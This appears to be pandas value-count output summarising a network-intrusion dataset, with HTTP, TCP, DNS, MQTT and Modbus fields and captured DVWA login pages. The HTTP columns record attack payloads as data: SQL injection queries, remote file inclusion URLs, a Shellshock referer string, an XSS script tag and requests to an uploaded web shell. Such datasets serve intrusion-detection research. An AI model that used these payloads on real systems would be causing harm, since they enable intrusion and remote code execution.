type="submit" value="Login" name="Login"></p>\r\n\r\n\t</fieldset>\r\n\r\n\t<input type='hidden' name='user_token' value='ee73c5eaeaa2350484c42aad163f14f7' />\r\n\r\n\t</form>\r\n\r\n\t<br />\r\n\r\n\t\r\n\r\n\t<br />\r\n\t<br />\r\n\t<br />\r\n\t<br />\r\n\t<br />\r\n\t<br />\r\n\t<br />\r\n\t<br />\r\n\r\n\t<!-- <img src="dvwa/images/RandomStorm.png" /> -->\r\n\t</div > <!--<div id="content">-->\r\n\r\n\t<div id="footer">\r\n\r\n\t<p><a href="https://github.com/digininja/DVWA/" target="_blank">Damn Vulnerable Web Application (DVWA)</a></p>\r\n\r\n\t</div> <!--<div id="footer"> -->\r\n\r\n\t</div> <!--<div id="wrapper"> -->\r\n\r\n\t</body>\r\n\r\n</html> 1
<!DOCTYPE html>\r\n\r\n<html lang="en-GB">\r\n\r\n\t<head>\r\n\r\n\t\t<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />\r\n\r\n\t\t<title>Login :: Damn Vulnerable Web Application (DVWA) v1.10 *Development*</title>\r\n\r\n\t\t<link rel="stylesheet" type="text/css" href="dvwa/css/login.css" />\r\n\r\n\t</head>\r\n\r\n\t<body>\r\n\r\n\t<div id="wrapper">\r\n\r\n\t<div id="header">\r\n\r\n\t<br />\r\n\r\n\t<p><img src="dvwa/images/login_logo.png" /></p>\r\n\r\n\t<br />\r\n\r\n\t</div> <!--<div id="header">-->\r\n\r\n\t<div id="content">\r\n\r\n\t<form action="login.php" method="post">\r\n\r\n\t<fieldset>\r\n\r\n\t\t\t<label for="user">Username</label> <input type="text" class="loginInput" size="20" name="username"><br />\r\n\r\n\r\n\t\t\t<label for="pass">Password</label> <input type="password" class="loginInput" AUTOCOMPLETE="off" size="20" name="password"><br />\r\n\r\n\t\t\t<br />\r\n\r\n\t\t\t<p class="submit"><input type="submit" value="Login" name="Login"></p>\r\n\r\n\t</fieldset>\r\n\r\n\t<input type='hidden' name='user_token' value='b95c6cbd85516d331207e913e9e33169' />\r\n\r\n\t</form>\r\n\r\n\t<br />\r\n\r\n\t<div class="message">CSRF token is incorrect</div>\r\n\r\n\t<br />\r\n\t<br />\r\n\t<br />\r\n\t<br />\r\n\t<br />\r\n\t<br />\r\n\t<br />\r\n\t<br />\r\n\r\n\t<!-- <img src="dvwa/images/RandomStorm.png" /> -->\r\n\t</div > <!--<div id="content">-->\r\n\r\n\t<div id="footer">\r\n\r\n\t<p><a href="https://github.com/digininja/DVWA/" target="_blank">Damn Vulnerable Web Application (DVWA)</a></p>\r\n\r\n\t</div> <!--<div id="footer"> -->\r\n\r\n\t</div> <!--<div id="wrapper"> -->\r\n\r\n\t</body>\r\n\r\n</html> 1
<!DOCTYPE html>\r\n\r\n<html lang="en-GB">\r\n\r\n\t<head>\r\n\r\n\t\t<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />\r\n\r\n\t\t<title>Login :: Damn Vulnerable Web Application (DVWA) v1.10 *Development*</title>\r\n\r\n\t\t<link rel="stylesheet" type="text/css" href="dvwa/css/login.css" />\r\n\r\n\t</head>\r\n\r\n\t<body>\r\n\r\n\t<div id="wrapper">\r\n\r\n\t<div id="header">\r\n\r\n\t<br />\r\n\r\n\t<p><img src="dvwa/images/login_logo.png" /></p>\r\n\r\n\t<br />\r\n\r\n\t</div> <!--<div id="header">-->\r\n\r\n\t<div id="content">\r\n\r\n\t<form action="login.php" method="post">\r\n\r\n\t<fieldset>\r\n\r\n\t\t\t<label for="user">Username</label> <input type="text" class="loginInput" size="20" name="username"><br />\r\n\r\n\r\n\t\t\t<label for="pass">Password</label> <input type="password" class="loginInput" AUTOCOMPLETE="off" size="20" name="password"><br />\r\n\r\n\t\t\t<br />\r\n\r\n\t\t\t<p class="submit"><input type="submit" value="Login" name="Login"></p>\r\n\r\n\t</fieldset>\r\n\r\n\t<input type='hidden' name='user_token' value='0e1b4e3c4ddd479fd79ff2d9e934f03a' />\r\n\r\n\t</form>\r\n\r\n\t<br />\r\n\r\n\t<div class="message">CSRF token is incorrect</div>\r\n\r\n\t<br />\r\n\t<br />\r\n\t<br />\r\n\t<br />\r\n\t<br />\r\n\t<br />\r\n\t<br />\r\n\t<br />\r\n\r\n\t<!-- <img src="dvwa/images/RandomStorm.png" /> -->\r\n\t</div > <!--<div id="content">-->\r\n\r\n\t<div id="footer">\r\n\r\n\t<p><a href="https://github.com/digininja/DVWA/" target="_blank">Damn Vulnerable Web Application (DVWA)</a></p>\r\n\r\n\t</div> <!--<div id="footer"> -->\r\n\r\n\t</div> <!--<div id="wrapper"> -->\r\n\r\n\t</body>\r\n\r\n</html> 1
<!DOCTYPE html>\r\n\r\n<html lang="en-GB">\r\n\r\n\t<head>\r\n\r\n\t\t<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />\r\n\r\n\t\t<title>Login :: Damn Vulnerable Web Application (DVWA) v1.10 *Development*</title>\r\n\r\n\t\t<link rel="stylesheet" type="text/css" href="dvwa/css/login.css" />\r\n\r\n\t</head>\r\n\r\n\t<body>\r\n\r\n\t<div id="wrapper">\r\n\r\n\t<div id="header">\r\n\r\n\t<br />\r\n\r\n\t<p><img src="dvwa/images/login_logo.png" /></p>\r\n\r\n\t<br />\r\n\r\n\t</div> <!--<div id="header">-->\r\n\r\n\t<div id="content">\r\n\r\n\t<form action="login.php" method="post">\r\n\r\n\t<fieldset>\r\n\r\n\t\t\t<label for="user">Username</label> <input type="text" class="loginInput" size="20" name="username"><br />\r\n\r\n\r\n\t\t\t<label for="pass">Password</label> <input type="password" class="loginInput" AUTOCOMPLETE="off" size="20" name="password"><br />\r\n\r\n\t\t\t<br />\r\n\r\n\t\t\t<p class="submit"><input type="submit" value="Login" name="Login"></p>\r\n\r\n\t</fieldset>\r\n\r\n\t<input type='hidden' name='user_token' value='f557c6c01ae3204bb7399793500a6a07' />\r\n\r\n\t</form>\r\n\r\n\t<br />\r\n\r\n\t<div class="message">CSRF token is incorrect</div>\r\n\r\n\t<br />\r\n\t<br />\r\n\t<br />\r\n\t<br />\r\n\t<br />\r\n\t<br />\r\n\t<br />\r\n\t<br />\r\n\r\n\t<!-- <img src="dvwa/images/RandomStorm.png" /> -->\r\n\t</div > <!--<div id="content">-->\r\n\r\n\t<div id="footer">\r\n\r\n\t<p><a href="https://github.com/digininja/DVWA/" target="_blank">Damn Vulnerable Web Application (DVWA)</a></p>\r\n\r\n\t</div> <!--<div id="footer"> -->\r\n\r\n\t</div> <!--<div id="wrapper"> -->\r\n\r\n\t</body>\r\n\r\n</html> 1
<!DOCTYPE html>\r\n\r\n<html lang="en-GB">\r\n\r\n\t<head>\r\n\r\n\t\t<meta http-equiv="Content-Type" content="text/html; charset=UTF-8" />\r\n\r\n\t\t<title>Login :: Damn Vulnerable Web Application (DVWA) v1.10 *Development*</title>\r\n\r\n\t\t<link rel="stylesheet" type="text/css" href="dvwa/css/login.css" />\r\n\r\n\t</head>\r\n\r\n\t<body>\r\n\r\n\t<div id="wrapper">\r\n\r\n\t<div id="header">\r\n\r\n\t<br />\r\n\r\n\t<p><img src="dvwa/images/login_logo.png" /></p>\r\n\r\n\t<br />\r\n\r\n\t</div> <!--<div id="header">-->\r\n\r\n\t<div id="content">\r\n\r\n\t<form action="login.php" method="post">\r\n\r\n\t<fieldset>\r\n\r\n\t\t\t<label for="user">Username</label> <input type="text" class="loginInput" size="20" name="username"><br />\r\n\r\n\r\n\t\t\t<label for="pass">Password</label> <input type="password" class="loginInput" AUTOCOMPLETE="off" size="20" name="password"><br />\r\n\r\n\t\t\t<br />\r\n\r\n\t\t\t<p class="submit"><input type="submit" value="Login" name="Login"></p>\r\n\r\n\t</fieldset>\r\n\r\n\t<input type='hidden' name='user_token' value='4dfb0c17e43b44105b684bdf27b022c5' />\r\n\r\n\t</form>\r\n\r\n\t<br />\r\n\r\n\t\r\n\r\n\t<br />\r\n\t<br />\r\n\t<br />\r\n\t<br />\r\n\t<br />\r\n\t<br />\r\n\t<br />\r\n\t<br />\r\n\r\n\t<!-- <img src="dvwa/images/RandomStorm.png" /> -->\r\n\t</div > <!--<div id="content">-->\r\n\r\n\t<div id="footer">\r\n\r\n\t<p><a href="https://github.com/digininja/DVWA/" target="_blank">Damn Vulnerable Web Application (DVWA)</a></p>\r\n\r\n\t</div> <!--<div id="footer"> -->\r\n\r\n\t</div> <!--<div id="wrapper"> -->\r\n\r\n\t</body>\r\n\r\n</html> 1
Name: http.file_data, dtype: int64
------------------
http.content_length
------------------
0.0 16989
277.0 158
57.0 60
36.0 53
1415.0 14
1465.0 10
303.0 8
5.0 7
38.0 6
1.0 6
47.0 6
37.0 5
115.0 5
12.0 4
298.0 2
22.0 2
164.0 2
Name: http.content_length, dtype: int64
------------------
http.request.uri.query
------------------
0.0 16313
0 701
0.0 233
path_prefix=http://cirt.net/rfiinc.txt? 4
mosConfig_live_site=http://cirt.net/rfiinc.txt? 2
...
id=8&Submit=Submitid%3D58%20ORDER%20BY%206853--%20nFBN 1
id=8&Submit=Submitid%3D58%27%29%20WAITFOR%20DELAY%20%270%3A0%3A5%27%20AND%20%28%27lWHw%27%3D%27lWHw 1
id=8%3BWAITFOR%20DELAY%20%270%3A0%3A5%27--&Submit=Submitid=58 1
id=8&Submit=Submitid%3D58%27%29%20AND%202556%20IN%20%28SELECT%20%28CHAR%28113%29%2BCHAR%28122%29%2BCHAR%28118%29%2BCHAR%28113%29%2BCHAR%28113%29%2B%28SELECT%20%28CASE%20WHEN%20%282556%3D2556%29%20THEN%20CHAR%2849%29%20ELSE%20CHAR%2848%29%20END%29%29%2BCHAR%28113%29%2BCHAR%28112%29%2BCHAR%28107%29%2BCHAR%28120%29%2BCHAR%28113%29%29%29%20AND%20%28%27SFoV%27%3D%27SFoV 1
AMG_serverpath=http://cirt.net/rfiinc.txt? 1
Name: http.request.uri.query, Length: 87, dtype: int64
------------------
http.request.method
------------------
0.0 15033
0 1510
0.0 546
GET 236
POST 11
TRACE 1
Name: http.request.method, dtype: int64
------------------
http.referer
------------------
0.0 16441
0 641
0.0 252
() { _; } >_[$($())] { echo 93e4r0-CVE-2014-6278: true; echo;echo; } 2
127.0.0.1 1
Name: http.referer, dtype: int64
------------------
http.request.full_uri
------------------
0.0 15033
0 1514
0.0 546
http://192.168.0.128/DVWA/hackable/uploads/hack.php 25
http://192.168.0.128/DVWA/login.php 24
...
http://192.168.0.128/DVWA/backup.tar 1
http://192.168.0.128/DVWA/siteseed/ 1
http://192.168.0.128/DVWA/servlet/SchedulerTransfer 1
http://192.168.0.128/DVWA/search.php?searchfor=\"><script>alert(1776)</script> 1
http://192.168.0.128/DVWA/cfdocs/examples/parks/detail.cfm 1
Name: http.request.full_uri, Length: 195, dtype: int64
------------------
http.request.version
------------------
0.0 15033
0 1519
0.0 537
HTTP/1.1 220
HTTP/1.0 28
Name: http.request.version, dtype: int64
------------------
http.response
------------------
0.0 17091
1.0 246
Name: http.response, dtype: int64
------------------
http.tls_port
------------------
0.0 17337
Name: http.tls_port, dtype: int64
------------------
tcp.ack
------------------
0.0 4153
1.0 2628
6.0 1916
5.0 1380
59.0 1323
...
389613.0 1
103039640.0 1
103106745.0 1
390509.0 1
116.0 1
Name: tcp.ack, Length: 3090, dtype: int64
------------------
tcp.ack_raw
------------------
0.000000e+00 4153
2.213215e+09 56
1.453307e+09 44
2.013966e+09 25
1.013594e+09 10
...
1.280868e+09 1
2.372157e+09 1
4.276651e+09 1
2.372158e+09 1
1.638961e+09 1
Name: tcp.ack_raw, Length: 13052, dtype: int64
------------------
tcp.checksum
------------------
0.0 2013
6951.0 4
7490.0 4
20511.0 4
55069.0 4
...
65303.0 1
42722.0 1
20836.0 1
57524.0 1
20019.0 1
Name: tcp.checksum, Length: 13650, dtype: int64
------------------
tcp.connection.fin
------------------
0.0 15789
1.0 1548
Name: tcp.connection.fin, dtype: int64
------------------
tcp.connection.rst
------------------
0.0 15739
1.0 1598
Name: tcp.connection.rst, dtype: int64
------------------
tcp.connection.syn
------------------
0.0 16183
1.0 1154
Name: tcp.connection.syn, dtype: int64
------------------
tcp.connection.synack
------------------
0.0 16622
1.0 715
Name: tcp.connection.synack, dtype: int64
------------------
tcp.dstport
------------------
1883.0 5198
0.0 2013
60944.0 1415
80.0 1301
5900.0 690
...
57358.0 1
57350.0 1
57342.0 1
57277.0 1
61273.0 1
Name: tcp.dstport, Length: 5602, dtype: int64
------------------
tcp.flags
------------------
16.0 6820
24.0 3489
0.0 2013
4.0 1285
2.0 1154
17.0 859
18.0 715
25.0 689
20.0 313
Name: tcp.flags, dtype: int64
------------------
tcp.flags.ack
------------------
1.0 12885
0.0 4452
Name: tcp.flags.ack, dtype: int64
------------------
tcp.len
------------------
0.0 12113
1440.0 1049
2.0 687
4.0 676
41.0 673
...
912.0 1
1297.0 1
1343.0 1
1179.0 1
1269.0 1
Name: tcp.len, Length: 374, dtype: int64
------------------
tcp.options
------------------
0 11485
0.0 2233
020405b40103030801010402 613
020405b40101040201030307 604
0.0 207
...
0101080a9b25f6bc9eb3895d 1
0101080a9b25d1a59eb36459 1
0101080a9b25cfda9eb3628f 1
0101080a9b25cdd09eb3608e 1
020405b40402080a9e4e616c9ac0ce6b01030307 1
Name: tcp.options, Length: 2198, dtype: int64
------------------
tcp.payload
------------------
0 10064
0.0 1977
e000 687
20020000 676
100c00044d5154540402003c0000 659
...
66d99ee9599d881c69977287047799d97039e954a5b8561fbf2c1d39eca2b8cf05e84b68e5523da415e075334e77848aaab5b5eb47c96784224b253bed9225c70b887121254e843731ac4e8940f1ca6c2795384cac47b356906d38d5bd848661e2e5ed254e44ecabc603e58983aa7d1180141062f881c46a6ce70e4f580e174787b2bfdd908d5a95e2f0e72e3424ba5c8854a7e623eefcf2d2f58679c4de0581e491314bd84f36a06cbd72eb17beb69044b4da890d646ead32e380cdc126911d384387a41cdb94e60ebbd6cf65373d31c55a40aef2130d9094306da8d7b01363d7ea8c56614b20bf9afe8e6e348bf8eb2d20ec75dbdfb593dc6616432dcf927201396b04d5ff0812ff407e4b7187662002e9726c2a9bde20c66775860a79e866f6bc72de4acd00ba968e0c59367f37784234f847bf3ef96fb3311e819a8ed0991afb1398fdbdec3201c8b14ca7ca53fbb9674a16cf811acf72a47ce5857d1dd8272c0b52649ec0dacb3a2e40f099f67b9181bc843e9ceecc411e0b698a1e41f8280ef29a040f0ad9ddb4acce7274ae228bc20caec882a48de324828a384c988b5291b42362a41490a3164d0792fdbccaf237966f57394cae02db3259df45dc220c7893b21a0e80ea04f2eb6a2987b3b85d234ea264cd5b98ffcc1ffe62913bd661909d229ae15723fc03f7f32dc2b6d29d6fcb993457f8a8b7c0a4129ae1f168456d0533f8603b652afda00d9e20dff922522acdb64aef892fa1c1c53fd29bf238e0f34a96c2563c14481d3af3fee31e6424b6c3549882c41995dcf1feee1bf62b479e21ee1e98b3641c7f524282531072b5bc8d2523f1e91a11df7ac7d7b46ca73c6e35cafe55ca2eb39eed71c5ed9f75d170d18d2d2841c587b560ec437d6f5736d9ce31fbd59495a43d9fe1e08d3424d2607fb08c494eb8a320875b531ac59fad0ec7e6bf3a348409e3c082359cf6d2b99aaab91aea2df9f4664e714ab4ec2db0fab981ce1f98c0add62ced060618109fac51f4df1d46e2c07c2ed24f0c8993a2a300407aa115a5ef7047c7068733a301c734a38cdd51bbdc05bf2a48b32c4ef94bc3af7e55b8188abbdf3eb4fee779d4ccb78f842e48c038c9cbe4d6bc5d38ada6c657c1e7306364a9d3a908cac6c3380435da0a21164ba33ca7856c3cab546a195b44cc428ecd593848f1e556144668b21fedefb1d2b82aebeb9ea1777e9d276d0cb293ca557575c0768a1609bf07803d10f1bf232087f67ff3cc275e047996b58f1d9165495a7d8849c6361ca68f6cc18dcbbbf45c613627f37a63950141f1d23983d7b2d6230122910018d978d83da4699b3dc41f12d49a99f190802eaeb8c3313efd54845f81ea505b00cd4156d6cb13d31753caa7c694bbe3c8ef8243994e03afce99a181ee3863affb6d30c0f339a642adffab9d39c10f1d034b35f18f56edc256c658eef8acc9773dd3722930bddb2f5c11e683fbe059017e1d2f9d3779722f10c0524be7b153955f7675c6b0e782f104bf30a34a488aa5dc03e42844ff3e144b6d19530601b3a89dec82e36a493755dc239e4f20d341c8293cb43cc2a3de9395fa01f65abdba7ad1ac4a55bd410a0d0e32d8e469c9ec311f85847d2233a5708ade82eb108b447ceda51330f17c469067f5ddcbf8790c1479df96a3522ef096622003d4d7e7b9b472ae13a7e326fa4281c99e90c11e5e981aaf7986d221ca95c829976607d848d223dc42bd2c66cb31f16beea5e8cf51fc1ba30bfabed5c7f0d97371b4306e2a6f44a48042e6f6d20f470bad7ae807769d2b76be09c99ef2943ec2fe5d0d44e13f5983f32f67235d1c74e4a1d87d5aa0507c39f02ceac26bc199f3d794a0fd030646721971e1b31ad086e79c3858aa42baaf2cc2488b98aa9af65422b7bf4220662a7989609f2476d648d4aa557422aa610d9fa5583e6dc3ecd7e042370c1e3d4b9b31733c440dc46e0284dd0a5b2f0d57c20e033b747064a0c0e7dfcb20b6c42c6d40a1d64fd97e9ec6c3dd901e34f344265711 1
13a3a2baf673ef5291053cffac4c4525e5508a8ccc4fefcaf4bccc2c460e8526cd8000486caf952f153bfe3b64953fbe5ce88bb1282cd258f689f62b2676475161357cd2b0e146d4942a132d7a8437b51e8def779444e1e0b4b8538915b7b6682726c492dac510e5519bd02164fa2c872b25c3cce6f30d94af87e8b15cdb977a367b6d88c9c4b0e4c870a6833f12b7d11d3ac705692d8c3c7e688a9fd8cc6f4c4594285a880949401497f7c910e137d58ef896b2e333905f657a58b4f21b2d11bb21c5c8c6e44e542c0707587d3ff15c21a88f56a93c0e766eb3a2a392aa6bf290d8741770bd778a3a446b4dd08f8dba3140ad4c25ba802aba02c1aa5026ef39ad2fc063bcb836c64a1a2fa006739a5efe6ab5c29e2cde7446bf78bfa477abf64ed3f95da50ee88b5e9aeebd82b85837f2c4bb3489626466b205084945c15273eef333164689f90bc595c271de544b8124ac85600d819092df32119a5733d958ec5550d799e849169b77128ff50eb6bd5f741e8616fe941cc7c161e52c2c5f3b10d1d0d09f88e1ec397d0dbe11273a5e45c56514a51032ff725322899e6f88946809675236552b5ab06aae77f36da088990301fcec55b8f9b2fac23438a2c7e4078555c808396d46949f39d80874fb3fbbf2b08cd036dba10a4da9438efbc8aa4bdd6935ce70804d54a83803713584be8aee221702c1773ed4e0be2760e239a3cb7cf677b0a00c49fdf162d4537ec98296afdf60eb4999b5a8d4908229dd5375f9427ed68db1953ff2cef51b1f49125aa8b66124f11398236b0b49f0127712bd91eb5a7735c5b7bf399c6399207e5487e467baaadfb34cd09a0606a8d64db7f79b6cb3313f90a8ddd66fab85fe44974c60d1bcb525a3494c5289aa860f2fef06688772d7ebdbac38b196d9baaa3d3111f064cf6f4129278065e5b1fd18633916997ccd0390f2b75b1cf2430673231a82945fa371d1330847228252703e2f372b72f4fef7fde2e28182440213530aafbf60624bba0a885e88c32a57198dc8fb1ab618812a77fb83466a8fecefef8de9a8037b5195a9f9739f0bf9c9d6fa5f90284f82912108efaa9fd0834b1281a593729bfe449729d96b3a397131ddbe293ea9dc8584dc40f7bda16d692ed4584a974dd44f82a3e07245ecb47f08431d864ec7a22ebc3e76703ed116058c57361b38e9488d96bde210d58d706418f7659da6129deb943ef2e13f2dbaac7bdc54cc4856b76a0913ed464c11deea164a3d17924cfc9403f5ecbf9ae94d71198183f517edffcb990f2529d3d391cad82acf47acabf81a20ccb9dc0508ee6673b25c8bf56df812080776e0d8db5a7a58da77b0787901fe750c3ec0e07b016314a40a74475aed7c70e9fe4f14858fb5c9d40732f2bc7a775c0613e82c2f772dd606535b1af61dc1c311cf368d670432f4abb17355e81fb1b03acf501d1e47ebe3a87e8e8ca50c0e2bd6e5b9fdd0e9c27ca8255d7aaddd59c6c578ef4f6690a847211700fa1dfc642c51fd1175f3f31be7472c8d1459c20e8465182526309323f6f38346cc275715a6d5a30188f7fb7a1d924a455b8a06aeca4f1256adde33e5d05a1ac7b8c4aa7a6a34198f0a6dc9521e0875d7a9496afe296d08c41f3fc3591990ffbdc0f186fb4c59270088d12ad93dbda251a83e5c1c13c4ee8f61caa5c94d28baf446ce16a80e4874071c13321c028db36beac3b81318c6d5a29871b2c072123480362737de578cc258b4e9a00b912ddfa07ad128f37e0115e2501845ea0ca0140e297237860aae607a1109ffb19f38e8a632f8a03a9e173c38c422d371261e325a4b6cddaae5730a088f8f8587461a8132c9b6839c4218907e06811c8a83524cfd60b281cb695a058dd82a7ef03b36fd18a7b72ac447f1e91f86821c589d36c0c0decc3220cdb8090d3bf7adf030cbb51b90f99758e1bcd032392929b9e393da56bb059e10f30effd6277293a458d6c5d13d4e429c914e24d71bd4408e9127f8434dbc7db3dda65368bc97177e35e223fb73a5 1
000e616994958dbecc4340ca427acf4889cadf1df570c5ff61cf0a8c17778762 1
05c880d75f9f71910a4a87f07dc52b123f9e8238dde92bf552e63c20a593da3b8403d3f2641cc4a4eb75f9b1aa195ab363a6a28205d0e867ad3d7e2be68832671ac2fdda129bc54a782fdce8a743a7cfae3ce30728991c528864bcf2cefc9ad7c66fac1a60728b6ac84e29bb556f051b97dd68f3302023111c5921f61b27580c7a39751c6c04f3f68ea843ae7754da027d40422a51159527179ab2580a908d20c04beee913da58b7ade6f942f6e1c08fb393f32ef2bedb45577272b8c29b354977d625ff7b81f34698974026dd969dc9452ce540c570a3d24fe11330278092bdb288b67d326fe6a983b25a701b8770abb65dd4158e642283dbd22bcc43a7b0c4c2226d61a168a155d398babc5b28e1e0e37ca791e684984ba82925c86fee101a36710176f0cf82bc3f114b5338794f634ddff183a6fd768af0b86333fa849f7a3dd0f074b394c5ad1627e951a678d6d9ea428410cb3f28d5dca5252eaaff98721f6f78460e94f7b86eb56ff7fce6d062100f91ff2063965e5115ce4a67d5b9b4eb301639974896a777f6f16781e380005fe8226c42f6ff63cfc76b3427b68e26f5b31dd4571c43aa9a7ad8462ccedfbcdc19472f4f241d8e22cc17b263a0f0600bb02c05fd17afdb5f77f5b659f3661486cfba8909e31278cc7fb517a36eef6f92536140672740da3f50cb0e56af336e1f101e54a96df40b8b3b129783a68cb4e0ab4259b81df5a37fc80d797554b228f0072c34cca1f66c8c5489f30d1f671df9d1c49c983415c5ae95ee06bd7168f92e2f7d9e97c5f1e07471e5fc1aaffd4b71fb4892552e11825541cc786d2536750e64e24788502fed2bd71c092f62ecc3df5e4cca71392da61e0fb06d4ce9372f83f44fdfe9fe1f03d2466cd2fb876da3c1dd83fc32bde43c7d142576fb80efcdc7e764b17b8abe1f05ffafe4d0ef8c315faa359f6d116763ffac970b70912c39bd7bda035dff148e8f6461550d200a35419db136f41f89444229639f30a52da47b3e9c956a9ac3ddcfb984fdf00cb19d25a93f7dc23bf54973ae39cc293c574aa74f1b9a7cacefd640d7737b181bddf642e4e4f7ab8ab9acf7ce7db565ff8a97ae086cf2ed906a2981833fb077ceba258976935e18be11c6b8b46809d0c6b2963c791dc77493583e3736614b64fc7a1b94cff48ce48808aec849df5167f5c258e690bbcb9e64fa4d0a243013d3956de8d0c0de965730718d510bef12086abb74011fbd053ac6f6baa848fe7c752b3cc311417d94be0706980e371afdbf7dde2715cc179aba901c5d53e1cf85b062bb0af9b7b663c6b165bb4f1c6f126b8368cc5fd3a53332272a05dbd2de568c577b282ed78ccf0cad421f08793e64cc46e62aa1d834f8aade0dcfb57307d607c5dbcce817004132d84c4ece5f45ef101463dd0afd33308b2bc71881b194ec4a12aab76692889945109d55fa385e3dc20650aa83b4b539203c0c64226b7d3abf3be71a8bfaf48ac2722c5c49836a0b08ecc1760a8a63fad75e5dd76fb2127c79d60d0263d3e24661dbcefec6b71ebea68ad7606519158e3d64252bc2b8b273a138625698c148636f589bc4c9b0295e742100b3ee0d1e9e9b4358caa37d058633b11d3f412679874f7a8cced9c593a00796830b625f05792e69651666c2d7b1343edbdfeaaaa6657a5faa91940293d76052dfe3b5a65bc4da9b93458f9aefbfa2bb3c8c0feb1247238819b57a6632c11ea05ac4536205e56a4ebc10acb0cb2b513909c4cc7f04b865b1e5ad44e7112745fbac5412ff41931990480def0f1fe04916bd648d7e2258f64eb22d9c548c47f08b8348504ed463e6cc4f38c8669be6e4477b83210ef2a66c25012009082b1cd7d37f976858b1514f713d29e3f415ecf52bd3b47f58886d6d335508ed8723bcc46b6782575c7f96be1a4974ec112d290d20e413fe98461dec9ada10d175c8d1357ced2700ffa57638a0be12fa6770d13e3c4ec33f1a08bc875eac4729f7aeeeb321d672b1d01581fffe5b7dacbcec59b2447657 1
485454502f312e3120343034204e6f7420466f756e640d0a446174653a204d6f6e2c203239204e6f7620323032312031383a35323a313920474d540d0a5365727665723a204170616368652f322e342e33382028526173706269616e290d0a436f6e74656e742d4c656e6774683a203237370d0a436f6e74656e742d547970653a20746578742f68746d6c3b20636861727365743d69736f2d383835392d310d0a0d0a3c21444f43545950452048544d4c205055424c494320222d2f2f494554462f2f4454442048544d4c20322e302f2f454e223e0a3c68746d6c3e3c686561643e0a3c7469746c653e343034204e6f7420466f756e643c2f7469746c653e0a3c2f686561643e3c626f64793e0a3c68313e4e6f7420466f756e643c2f68313e0a3c703e546865207265717565737465642055524c20776173206e6f7420666f756e64206f6e2074686973207365727665722e3c2f703e0a3c68723e0a3c616464726573733e4170616368652f322e342e33382028526173706269616e2920536572766572206174203139322e3136382e302e31323820506f72742038303c2f616464726573733e0a3c2f626f64793e3c2f68746d6c3e0a 1
Name: tcp.payload, Length: 2315, dtype: int64
------------------
tcp.seq
------------------
0.0 3881
1.0 3541
6.0 1941
59.0 1933
5.0 1336
...
93410672.0 1
352666.0 1
93579271.0 1
93756504.0 1
117.0 1
Name: tcp.seq, Length: 2804, dtype: int64
------------------
tcp.srcport
------------------
1883.0 5135
5900.0 1452
0.0 1138
80.0 1123
60944.0 664
...
64335.0 1
64318.0 1
64309.0 1
64273.0 1
57667.0 1
Name: tcp.srcport, Length: 6593, dtype: int64
------------------
udp.port
------------------
0.0 17316
53.0 4
15.0 3
40599.0 1
36709.0 1
41722.0 1
53295.0 1
38300.0 1
34248.0 1
57963.0 1
55788.0 1
45424.0 1
48805.0 1
37533.0 1
53788.0 1
5353.0 1
21.0 1
Name: udp.port, dtype: int64
------------------
udp.stream
------------------
0.0 16371
53.0 8
123.0 4
1950000.0 1
1908332.0 1
...
955849.0 1
958821.0 1
961772.0 1
964337.0 1
2896493.0 1
Name: udp.stream, Length: 957, dtype: int64
------------------
udp.time_delta
------------------
0.0 17316
255.0 4
19.0 1
346.0 1
469.0 1
461.0 1
444.0 1
441.0 1
400.0 1
359.0 1
335.0 1
169.0 1
123.0 1
316.0 1
306.0 1
246.0 1
235.0 1
198.0 1
326.0 1
Name: udp.time_delta, dtype: int64
------------------
dns.qry.name
------------------
0.0 17228
1489372.0 1
2234685.0 1
2226315.0 1
2215474.0 1
...
628160.0 1
601414.0 1
554162.0 1
524912.0 1
2888207.0 1
Name: dns.qry.name, Length: 110, dtype: int64
------------------
dns.qry.name.len
------------------
0 15417
0 1857
0.0 49
0.debian.pool.ntp.org 4
1.debian.pool.ntp.org 3
2.debian.pool.ntp.org 3
3.debian.pool.ntp.org 2
_googlecast._tcp.local 1
1.0 1
Name: dns.qry.name.len, dtype: int64
------------------
dns.qry.qu
------------------
0.0 17323
21.0 12
22.0 1
851.0 1
Name: dns.qry.qu, dtype: int64
------------------
dns.qry.type
------------------
0.0 17337
Name: dns.qry.type, dtype: int64
------------------
dns.retransmission
------------------
0.0 17324
28.0 9
1.0 3
12.0 1
Name: dns.retransmission, dtype: int64
------------------
dns.retransmit_request
------------------
0.0 17336
1.0 1
Name: dns.retransmit_request, dtype: int64
------------------
dns.retransmit_request_in
------------------
0.0 17336
1.0 1
Name: dns.retransmit_request_in, dtype: int64
------------------
mqtt.conack.flags
------------------
0 11945
0.0 4665
0x00000000 676
0.0 50
1461074 1
Name: mqtt.conack.flags, dtype: int64
------------------
mqtt.conflag.cleansess
------------------
0.0 16678
1.0 659
Name: mqtt.conflag.cleansess, dtype: int64
------------------
mqtt.conflags
------------------
0.0 16678
2.0 659
Name: mqtt.conflags, dtype: int64
------------------
mqtt.hdrflags
------------------
0.0 14645
224.0 687
32.0 676
48.0 670
16.0 659
Name: mqtt.hdrflags, dtype: int64
------------------
mqtt.len
------------------
0.0 15332
2.0 676
39.0 670
12.0 659
Name: mqtt.len, dtype: int64
------------------
mqtt.msg_decoded_as
------------------
0.0 17337
Name: mqtt.msg_decoded_as, dtype: int64
------------------
mqtt.msg
------------------
0 11952
0.0 4665
32332e36332037342e35330d0a 66
32332e38322037342e38370d0a 52
0.0 50
...
32342e31322037352e34320d0a 1
32342e35352037362e31390d0a 1
32342e34382037362e30370d0a 1
32322e39352037332e33310d0a 1
32332e30332037332e34360d0a 1
Name: mqtt.msg, Length: 86, dtype: int64
------------------
mqtt.msgtype
------------------
0.0 14645
14.0 687
2.0 676
3.0 670
1.0 659
Name: mqtt.msgtype, dtype: int64
------------------
mqtt.proto_len
------------------
0.0 16678
4.0 659
Name: mqtt.proto_len, dtype: int64
------------------
mqtt.protoname
------------------
0 11963
0.0 4665
MQTT 659
0.0 50
Name: mqtt.protoname, dtype: int64
------------------
mqtt.topic
------------------
0 11952
0.0 4665
Temperature_and_Humidity 670
0.0 50
Name: mqtt.topic, dtype: int64
------------------
mqtt.topic_len
------------------
0.0 16667
24.0 670
Name: mqtt.topic_len, dtype: int64
------------------
mqtt.ver
------------------
0.0 16678
4.0 659
Name: mqtt.ver, dtype: int64
------------------
mbtcp.len
------------------
0.0 17335
27.0 2
Name: mbtcp.len, dtype: int64
------------------
mbtcp.trans_id
------------------
0.0 17335
106.0 1
122.0 1
